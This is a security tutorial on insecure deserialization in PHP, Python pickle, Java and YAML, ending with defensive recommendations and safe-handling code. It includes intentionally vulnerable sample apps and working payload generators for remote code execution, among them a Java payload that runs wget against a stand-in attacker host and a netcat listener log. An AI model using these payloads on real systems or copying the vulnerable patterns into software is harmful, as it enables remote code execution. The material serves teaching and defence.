Insecure deserialization
Introduction
What does deserialization mean?
Serialization is the process of representing structures and objects specific to a certain programming language in a single format, usually as a specific string format or a byte sequence.
Deserialization is the reverse process that involves the restoring of structures and objects from a serialized string or a byte sequence.
Serialization and deserialization are often used to save the program’s current state, for instance, on a hard drive or in a database, and to exchange data between various applications.
Modern programming languages provide convenient built-in mechanisms to serialize and deserialize their structures. Developers favor them because they are quick and easy to use, require no additional libraries, and spare users the trouble of handling incompatible serialized data.
However, these mechanisms do far more than represent objects in a single format: restoring an object can also invoke code defined by its class. Unfortunately, many developers do not give this due consideration, which results in programming errors and, consequently, in serious application security problems.
Deserialization in PHP
PHP implements serialization and deserialization through the built-in serialize() and unserialize() functions, respectively.
The serialize() function takes an object as a parameter and returns its serialized representation as a string.
The unserialize() function takes a string that contains a serialized object as a parameter and returns a deserialized object restored from this string.
Let us consider a simple example.
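    <?php
    class Injection {
        public $some_data;

        // Called automatically when an Injection object is unserialized
        function __wakeup() {
            if (isset($this->some_data)) {
                eval($this->some_data);
            }
        }
    }

    if (isset($_REQUEST['data'])) {
        // Vulnerable: user-controlled input is passed to unserialize()
        $result = unserialize($_REQUEST['data']);
        // do something with $result object
        // ...
    }
    ?>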
In this example, the Injection class implements the __wakeup() magic method. PHP calls this method automatically as soon as an Injection object is deserialized, and, as illustrated, it executes the code stored in the $some_data property.
Using the code below, we will generate the payload to exploit this type of structure.
    <?php
    class Injection {
        public $some_data;

        function __wakeup() {
            if (isset($this->some_data)) {
                eval($this->some_data);
            }
        }
    }

    $inj = new Injection();
    $inj->some_data = "phpinfo();";
    echo(serialize($inj));
    ?>
As a result of code execution, we get a serialized object as follows:
O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
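To make the layout of this string easier to read, here is a minimal Python sketch that rebuilds it by hand. The helper names php_serialize_string and php_serialize_object are hypothetical, and the sketch only covers the case shown here (an object whose public properties are all strings); it is not a general PHP serializer.

```python
def php_serialize_string(value: str) -> str:
    # Layout: s:<byte length>:"<value>";
    return 's:{}:"{}";'.format(len(value.encode("utf-8")), value)


def php_serialize_object(class_name: str, props: dict) -> str:
    # Layout: O:<class name length>:"<class name>":<property count>:{<name><value>...}
    body = "".join(
        php_serialize_string(name) + php_serialize_string(value)
        for name, value in props.items()
    )
    return 'O:{}:"{}":{}:{{{}}}'.format(
        len(class_name.encode("utf-8")), class_name, len(props), body
    )


serialized = php_serialize_object("Injection", {"some_data": "phpinfo();"})
print(serialized)
```

Each length prefix counts bytes, which is why "Injection" and "some_data" are both prefixed with 9 and "phpinfo();" with 10.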
Now let us inject this serialized object into our vulnerable application as data within the data parameter.
https://example.com/vulnerable.php?data=O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
When the application deserializes the injected object, __wakeup() runs and the built-in phpinfo() function is executed. This gives an attacker the opportunity to execute arbitrary code remotely on the vulnerable system.
It should be noted, however, that exploitation of insecure deserialization in PHP does not always lead to remote code execution. It may instead result in the reading or writing of arbitrary files, SQL injection, denial of service, etc.
For a successful attack, the target application must have classes that implement the respective magic methods. Generally, the most useful methods for this purpose are __destruct(), __wakeup() and __toString(). Furthermore, to identify a vulnerable class or a chain of classes (the so-called ’gadget’), the attacker must have access to the source code.
However, applications are often built on common frameworks and libraries that already contain the necessary gadgets. In this case, the payload can be generated with the help of the PHPGGC utility.
Deserialization in Python
Python and PHP have very similar serialization and deserialization mechanisms. In Python, these processes are implemented through the built-in pickle module.
pickle.dump() takes an object and an open binary file object as parameters and writes the serialized version of the object to that file.
pickle.load() takes an open binary file object that contains a serialized object as a parameter and returns the deserialized object.
pickle.dumps() takes an object as a parameter and returns its serialized representation as a byte string.
pickle.loads() takes a byte string that contains a serialized object as a parameter and returns a deserialized object restored from this string.
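The four functions can be seen side by side in a short, harmless round trip. This is only an illustrative sketch: the state dictionary is made up, and io.BytesIO stands in for a real file opened in binary mode.

```python
import io
import pickle

state = {"user": "alice", "visits": 3}

# dumps()/loads() work on byte strings held in memory
blob = pickle.dumps(state)
restored_from_bytes = pickle.loads(blob)

# dump()/load() work on an open binary file object (BytesIO stands in for a real file)
buffer = io.BytesIO()
pickle.dump(state, buffer)
buffer.seek(0)  # rewind so that load() reads from the beginning
restored_from_file = pickle.load(buffer)

print(restored_from_bytes == state, restored_from_file == state)
```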
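Let us consider a simple example of a vulnerable application.
    import pickle
    from flask import Flask, request

    app = Flask(__name__)

    @app.route('/vulnerable.py', methods=['GET'])
    def parse_request():
        data = request.args.get('data')
        if data:
            # Vulnerable: attacker-controlled input is passed to pickle.loads()
            # (conversion of the parameter to bytes is omitted for brevity)
            result = pickle.loads(data)
            # do something with result object
            # ...
        return ''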
Using the code below, we will generate the payload to exploit this type of structure.
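    import pickle

    class Payload(object):
        # __reduce__ tells pickle how to rebuild the object: here, by calling exec()
        def __reduce__(self):
            return (exec, ('import os;os.system("ls")', ))

    pickle_data = pickle.dumps(Payload())
    print(pickle_data)
As a result of code execution, we get a serialized object as follows (this output corresponds to pickle protocol 3; Python versions that default to a newer protocol produce different bytes):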
b'\x80\x03cbuiltins\nexec\nq\x00X\x19\x00\x00\x00import os;os.system("ls")q\x01\x85q\x02Rq\x03.'
Now let us transfer this serialized and URL-encoded object to our vulnerable application as data within the data parameter:
https://example.com/vulnerable.py?data=%80%03cbuiltins%0Aexec%0Aq%00X%19%00%00%00import%20os%3Bos.system%28%22ls%22%29q%01%85q%02Rq%03.
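The URL-encoding step can be reproduced with the standard urllib.parse module. The sketch below simply percent-encodes the byte string printed earlier and checks that decoding restores it; the variable names are illustrative.

```python
from urllib.parse import quote, unquote_to_bytes

# The pickled bytes from the output above, copied verbatim
pickle_data = b'\x80\x03cbuiltins\nexec\nq\x00X\x19\x00\x00\x00import os;os.system("ls")q\x01\x85q\x02Rq\x03.'

# quote() accepts bytes and percent-encodes every byte that is not
# a letter, a digit, or one of "_.-~" (and "/", which is safe by default)
encoded = quote(pickle_data)
print(encoded)

# Decoding restores the original bytes unchanged
decoded = unquote_to_bytes(encoded)
print(decoded == pickle_data)
```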
When the application deserializes the transferred object, the os.system() function is called with the ls argument. This lists the files in the application's current working directory and shows that an attacker can execute code remotely on the vulnerable system.
In the case of Python, no additional conditions are required for a successful attack. Therefore, to be on the safe side, avoid using pickle.load() and pickle.loads() to deserialize untrusted data.
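Where pickle cannot be avoided, the Python documentation describes restricting which globals a pickle may reference by overriding Unpickler.find_class(). The following is a minimal sketch of that idea, not a complete defense: the SAFE_BUILTINS allowlist, the restricted_loads() helper and the Probe class are assumptions made for illustration, and Probe uses the harmless os.getcwd() in place of a real payload.

```python
import builtins
import io
import os
import pickle

# Hypothetical allowlist: only these harmless built-in types may be referenced
SAFE_BUILTINS = {"set", "frozenset", "range", "complex"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle refers to a global (a class or a function)
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but refuses any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    # Harmless stand-in for an attacker payload: asks pickle to call os.getcwd()
    def __reduce__(self):
        return (os.getcwd, ())


# Plain data still loads
print(restricted_loads(pickle.dumps({"ids": {1, 2, 3}})))

# A pickle that references a function outside the allowlist is refused
try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

This narrows what a pickle can do but does not make pickle safe in general, so avoiding it for untrusted input remains the better option.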
Deserialization in Java
Deserialization in Java is similar to the PHP and Python processes.
The following entry points are usually involved:
- readObject() method of the java.beans.XMLDecoder class
- fromXML() method of the com.thoughtworks.xstream.XStream class
- readObject() and readUnshared() methods of the java.io.ObjectInputStream class, which in turn invoke the readObject(), readObjectNoData(), readResolve() and readExternal() methods defined by the classes being deserialized
Let us illustrate the use of the readObject() method of the java.io.ObjectInputStream class drawing on a simple example:
    import java.util.*;
    import java.io.*;

    class Injection implements Serializable {
        public String some_data;

        // Called automatically by ObjectInputStream when an Injection object is deserialized
        private void readObject(ObjectInputStream in) {
            try {
                in.defaultReadObject();
                Runtime.getRuntime().exec(some_data);
            } catch (Exception e) {
                System.out.println("Exception: " + e.toString());
            }
        }
    }

    public class Main {
        public static void main(String[] args) {
            Object obj = new Object();
            try {
                // The Base64-encoded payload is the first command-line argument
                String inputStr = args[0];
                byte[] decoded = Base64.getDecoder().decode(inputStr.getBytes("UTF-8"));
                ByteArrayInputStream bis = new ByteArrayInputStream(decoded);
                ObjectInput in = new ObjectInputStream(bis);
                obj = in.readObject();
                // do something with result object
                // ...
            } catch (Exception e) {
                System.out.println("Exception: " + e.toString());
            }
        }
    }
Using the code below, we will generate the payload to exploit this type of structure.
    import java.util.*;
    import java.io.*;

    class Injection implements Serializable {
        public String some_data;
    }

    public class Main {
        public static void main(String[] args) {
            try {
                Injection inj = new Injection();
                inj.some_data = "wget http://example.com:8080";
                ByteArrayOutputStream baos = new ByteArrayOutputStream();
                ObjectOutputStream oos = new ObjectOutputStream(baos);
                oos.writeObject(inj);
                oos.close();
                // Print the raw bytes, then the same bytes Base64-encoded
                System.out.println(new String(baos.toByteArray()));
                System.out.println(Base64.getEncoder().encodeToString(baos.toByteArray()));
            } catch (Exception e) {
                System.out.println("Exception: " + e.toString());
            }
        }
    }
As a result of code execution, we get a serialized object as follows:
��sr Injection��+r7�L some_datatLjava/lang/String;xptwget http://example.com:8080
For more convenient handling of the binary data, here is the same object in Base64-encoded form:
rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==
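The leading characters rO0AB are a useful fingerprint: a Java serialization stream starts with the magic number 0xACED followed by the stream version 0x0005, and that header always encodes to this Base64 prefix. A minimal Python sketch of such a check follows; the function name looks_like_java_serialized is hypothetical, and the check only recognizes the header, it does not validate the rest of the stream.

```python
import base64
import binascii

# Java serialization streams start with the magic number 0xACED and version 0x0005
JAVA_STREAM_HEADER = bytes.fromhex("aced0005")


def looks_like_java_serialized(b64_text: str) -> bool:
    """Return True if the Base64 text decodes to data with a Java stream header."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except (binascii.Error, ValueError):
        return False  # not valid Base64 at all
    return raw.startswith(JAVA_STREAM_HEADER)


# The Base64 string shown above, split in two only to keep the line short
payload = (
    "rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xh"
    "bmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA=="
)
print(looks_like_java_serialized(payload))
print(looks_like_java_serialized("aGVsbG8="))
```

A check like this can help spot serialized Java objects in request parameters, cookies or logs during a review.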
Let us transfer this serialized and base64-encoded object to our vulnerable application as an input parameter.
java -jar vulnerable.jar rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==
When the application deserializes the transferred object, Runtime.getRuntime().exec() is called with the wget http://example.com:8080 argument, which is confirmed by the incoming request on the attacker-controlled server example.com:
    root@example.com:~$ nc -lvnp 8080
    listening on [any] 8080 ...
    connect to [***.***.***.***] from (UNKNOWN) [***.***.***.***] 45430
    GET / HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: example.com:8080
    Connection: Keep-Alive
This is how the attacker is able to perform remote code execution in the vulnerable system.
As in PHP, remote code execution in Java requires that the application contain a suitable class that implements the Serializable interface. In our example, this is the Injection class. Again, it is almost impossible to find a suitable gadget without access to the source code. However, where the application uses common frameworks and class libraries, the payload can be generated with the help of the ysoserial utility.
YAML Deserialization
There is a variety of languages and frameworks that enable remote code execution during the course of YAML deserialization.
For example, executing the following code in Python outputs a listing of the current directory:
    import yaml

    yaml.load("!!python/object/new:os.system [ls -la]", Loader=yaml.UnsafeLoader)
This is quite a widespread problem. However, this article does not provide examples for other languages, since YAML processing is implemented differently in each of them.
As you can see from the code snippet above, the Loader=yaml.UnsafeLoader argument was passed explicitly when calling the yaml.load() function. This is important: recent versions of the library do not enable the vulnerable behavior by default.
Thus, an attempt to call yaml.load() without the Loader argument results in a warning:
main.py:3: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.
However, in earlier versions, the yaml.load() function did not restrict the construction of arbitrary objects. Therefore, the yaml.safe_load() function had to be used for secure deserialization of untrusted YAML. You can still come across this vulnerability in many applications that use earlier library versions to work with YAML.
Given the above, we recommend always using explicitly safe functions such as yaml.safe_load(), rather than relying on the foresight of the library vendor.
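As a rough illustration of the difference, the sketch below feeds yaml.safe_load() a document that carries a Python-specific tag. It assumes the third-party PyYAML package is installed, and it uses the harmless os.getcwd in place of a real payload.

```python
import yaml  # third-party PyYAML package

# Harmless stand-in for a malicious document
untrusted = "!!python/object/apply:os.getcwd []"

try:
    yaml.safe_load(untrusted)
except yaml.YAMLError as exc:
    # safe_load() only builds plain YAML types and rejects python/* tags
    print("rejected:", type(exc).__name__)

# Ordinary data is parsed as usual
config = yaml.safe_load("name: demo\nports: [80, 443]")
print(config)
```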
Conclusion
Serialization and deserialization are indeed powerful and flexible tools. They provide developers with a convenient way to manipulate, transmit and save data on hard drives or in databases. However, like any other tools, they should be used correctly and with security precautions in mind.
Let’s face it, there is no simple and universal method to protect an application from deserialization attacks (except maybe not using this mechanism). You are therefore encouraged to follow our recommendations for the safe use of deserialization:
- Apply secure deserialization methods where possible, e.g. yaml.safe_load() instead of yaml.load().
- Use simpler formats, e.g. JSON, to transmit and save data on the hard drive or in the database. While generally having less functionality, they do not carry such serious threats as embedded serialization mechanisms.
- Keep a whitelist of allowed classes. The developer can override the standard deserialization functionality to check whether the object being deserialized is allowed and whether the structures used in the serialized object are secure.
- Sign transmitted serialized data. This is a good option for network data exchange between applications. Without knowing the secret key, which is used to sign the transmitted data, the attacker will not be able to make any modifications. However, it should be noted that the application or the secret key may be compromised in a different way, which may have an adverse impact on the security of related applications.
- Use third-party libraries and frameworks specifically designed to improve the security of deserialization processes (e.g. SerialKiller or NotSoSerial for Java).
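The recommendations on simpler formats and on signing can be combined. The following Python sketch serializes data as JSON and protects it with an HMAC-SHA256 signature from the standard library. The names SECRET_KEY, pack() and unpack(), as well as the "signature.body" message layout, are assumptions made for illustration; a real application would load the key from secure storage.

```python
import hashlib
import hmac
import json

# Hypothetical key for the example; never hard-code a real secret
SECRET_KEY = b"replace-with-a-real-secret"


def sign(body: str) -> str:
    return hmac.new(SECRET_KEY, body.encode("utf-8"), hashlib.sha256).hexdigest()


def pack(data) -> str:
    """Serialize data as JSON and prepend its signature."""
    body = json.dumps(data, sort_keys=True)
    return sign(body) + "." + body


def unpack(message: str):
    """Verify the signature first, and only then parse the JSON body."""
    signature, _, body = message.partition(".")
    # compare_digest() compares in constant time to avoid timing leaks
    if not hmac.compare_digest(signature.encode("utf-8"), sign(body).encode("utf-8")):
        raise ValueError("signature mismatch: data was modified or the key is wrong")
    return json.loads(body)


message = pack({"user": "alice", "role": "viewer"})
print(unpack(message))

# Any modification of the body invalidates the signature
tampered = message.replace("viewer", "admin")
try:
    unpack(tampered)
except ValueError as exc:
    print("rejected:", exc)
```

Verifying before parsing means that unsigned or modified input never reaches the deserializer.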
It is not always easy to adhere to these recommendations, especially where the developer has to support existing code. However, given that deserialization attacks may lead to remote code execution and overall system compromise, the extra time and effort are fully justified.